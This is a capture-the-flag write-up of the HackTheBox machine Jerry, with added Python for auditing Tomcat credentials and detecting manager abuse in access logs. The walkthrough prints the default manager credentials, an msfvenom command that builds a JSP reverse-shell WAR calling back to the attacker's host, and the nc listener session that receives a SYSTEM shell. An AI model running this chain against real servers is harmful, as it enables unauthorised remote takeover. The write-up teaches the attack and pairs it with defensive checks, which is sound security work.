Jerry Writeup

Jerry is quite possibly the easiest box I’ve done on HackTheBox. There’s a Tomcat install with a default password for the Web Application Manager. I used that to upload a malicious war file ...

Vulnerability Exploited: Broken Authentication

System Vulnerable: 10.10.10.95

Vulnerability Explanation: On this server, an exposed port was running Apache Tomcat, and the administrator had left the default credentials in place for the manager interface. Because default credentials are publicly documented and easily obtained, an attacker can log in to the interface and deploy a war file, which is what gave us access to the server.

Vulnerability Fix: The administrator should have instead used a sufficiently long password that is difficult to crack.
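A defender can catch this misconfiguration before an attacker does by auditing tomcat-users.xml for the default pair named above and for short passwords on accounts that hold manager or admin roles. The following script is an added example written for this writeup, not code from the box or from the Tomcat project; the sample XML, the "deploy" and "ops" accounts, the extra default pairs and the 16-character minimum are assumptions chosen for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml for demonstration. The tomcat:s3cret pair
# is the default credential named in the writeup; the other two accounts are
# invented to show one weak and one acceptable password.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="Xk9!pTq2vL8#mZr4wQ7e" roles="manager-script"/>
  <user username="ops" password="short1" roles="manager-gui"/>
</tomcat-users>
"""

# Roles that grant deploy or admin capability through the Manager / Host Manager apps.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Username/password pairs treated as publicly known. tomcat:s3cret comes from the
# writeup; the other two are common default-wordlist entries and the set should be
# extended with whatever list your organisation maintains.
KNOWN_DEFAULTS = {("tomcat", "s3cret"), ("tomcat", "tomcat"), ("admin", "admin")}


def _local_name(tag):
    """Strip an XML namespace prefix such as {http://tomcat.apache.org/xml}."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text, min_length=16):
    """Return (username, issue, has_privileged_role) for every risky account.

    Assumes plaintext passwords in the file. If a CredentialHandler stores
    digests instead, the length check is meaningless and only the
    default-pair check is informative.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if _local_name(elem.tag) != "user":
            continue
        # Tomcat 7 writes "username"; older files used "name".
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}
        privileged = bool(roles & PRIVILEGED_ROLES)
        if (name, password) in KNOWN_DEFAULTS:
            findings.append((name, "default-credential", privileged))
        elif len(password) < min_length:
            findings.append((name, "weak-password", privileged))
    return findings


if __name__ == "__main__":
    for name, issue, privileged in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        flag = " (holds manager/admin role)" if privileged else ""
        print(f"{issue}: user '{name}'{flag}")
```

Run it against the real conf/tomcat-users.xml on the server (read the file into audit_tomcat_users) as part of a build or configuration check; any finding with the privileged flag set is exactly the condition this box was compromised through.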

Privilege Escalation Vulnerability: Least Privilege Violation

Vulnerability Fix: Tomcat doesn’t need SYSTEM privileges to function properly. Instead, it should have been run under a tomcat user account that has limited privileges. This way, even if we did get access to the box, we would have needed to find a way to escalate privileges, instead of immediately getting SYSTEM access without having to work for it. The administrator should have conformed to the principle of least privilege.

Severity: Critical

An initial Nmap scan revealed the Apache Tomcat Service on the 8080 port.

# Nmap 7.92 scan initiated Sun Dec 12 02:49:08 2021 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.088s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
 
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 12 02:49:32 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds

The initial page of Apache Tomcat/7.0.88

Visiting the Manager App, using the default credentials: tomcat:s3cret

Create a reverse shell payload using msfvenom and save it as shell.war

┌──(root💀kali)-[/root/HTB/windows/jerry]
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.8 LPORT=9001 -f war > shell.war
Payload size: 1100 bytes
Final size of war file: 1100 bytes

Upload shell.war to the web application

Launch an nc listener on the local machine and visit /shell on the web application:

Receiving a reverse shell as NT AUTHORITY\SYSTEM

┌──(root💀kali)-[/root/HTB/windows/jerry]
└─# nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.95] 51432
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
 
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
 
C:\apache-tomcat-7.0.88>
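The sequence just shown (failed manager logins, a successful deploy through the Manager App, then the first request to the freshly deployed /shell context) leaves a recognisable trail in Tomcat's access log. The detector below is an added example written for this writeup, not code from the box or from the Tomcat project. It assumes the default AccessLogValve pattern (%h %l %u %t "%r" %s %b); the log excerpt is constructed, with the attacker address taken from the writeup and the timestamps, byte counts, CSRF nonce and the second client invented.

```python
import re
from collections import Counter

# Constructed Tomcat access-log excerpt in the default AccessLogValve pattern.
# 10.10.16.8 is the attacking host from the writeup; everything else is invented.
SAMPLE_ACCESS_LOG = """\
10.10.16.8 - - [12/Dec/2021:02:50:00 +0000] "GET / HTTP/1.1" 200 11217
10.10.16.8 - - [12/Dec/2021:02:52:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.8 - - [12/Dec/2021:02:52:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.8 - - [12/Dec/2021:02:52:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.8 - tomcat [12/Dec/2021:02:52:09 +0000] "GET /manager/html HTTP/1.1" 200 11942
10.10.16.8 - tomcat [12/Dec/2021:02:55:10 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=0123456789ABCDEF0123456789ABCDEF HTTP/1.1" 200 12231
10.10.16.8 - - [12/Dec/2021:02:55:30 +0000] "GET /shell/ HTTP/1.1" 200 -
10.10.10.50 - - [12/Dec/2021:02:56:00 +0000] "GET /index.jsp HTTP/1.1" 200 11217
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Manager endpoints whose successful use means a new application was deployed.
DEPLOY_ENDPOINTS = {
    ("POST", "/manager/html/upload"),
    ("PUT", "/manager/text/deploy"),
    ("GET", "/manager/text/deploy"),
}


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def context_of(path):
    """First path segment, i.e. the Tomcat context the request landed in."""
    return "/" + path.lstrip("/").split("/", 1)[0]


def detect_manager_abuse(lines, auth_fail_threshold=3):
    """Walk the log once and return alerts as (kind, host, detail) tuples."""
    failures = Counter()     # host -> 401 responses on /manager
    known_contexts = set()   # contexts requested so far in the log
    deployers = {}           # host -> user that deployed through the manager
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        host, path = rec["host"], rec["path"]
        ctx = context_of(path)
        if path.startswith("/manager") and rec["status"] == 401:
            failures[host] += 1
            if failures[host] == auth_fail_threshold:
                alerts.append(("manager-auth-failures", host, failures[host]))
        if (rec["method"], path) in DEPLOY_ENDPOINTS and rec["status"] == 200:
            alerts.append(("manager-deploy", host, rec["user"]))
            deployers[host] = rec["user"]
        elif host in deployers and ctx not in known_contexts and ctx != "/manager":
            # Heuristic: the client that deployed is the first to touch a context
            # nobody requested earlier in the log, which is what triggering a
            # freshly uploaded war looks like.
            alerts.append(("new-context-hit", host, ctx))
        known_contexts.add(ctx)
    return alerts


if __name__ == "__main__":
    for kind, host, detail in detect_manager_abuse(SAMPLE_ACCESS_LOG.splitlines()):
        print(f"{kind}: {host} {detail}")
```

The manager-deploy alert alone is worth paging on for a server where nobody is expected to deploy interactively; the other two are corroborating signals, and the threshold should be raised on a host whose operators legitimately mistype passwords.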

user.txt & root.txt

The user and root proofs are stored in the same file, called “2 for the price of 1.txt”

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
C:\Users\Administrator\Desktop\flags>hostname
hostname
JERRY
 
C:\Users\Administrator\Desktop\flags>whoami
whoami
nt authority\system
 
C:\Users\Administrator\Desktop\flags>ipconfig /all
ipconfig /all
 
Windows IP Configuration
 
   Host Name . . . . . . . . . . . . : JERRY
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-50-56-B9-63-D6
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 10.10.10.95(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.2
   DNS Servers . . . . . . . . . . . : 10.10.10.2
   NetBIOS over Tcpip. . . . . . . . : Enabled
 
Tunnel adapter isatap.{4C9FEAFE-6811-4938-BFB6-5A3280613EF9}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
 
C:\Users\Administrator\Desktop\flags>
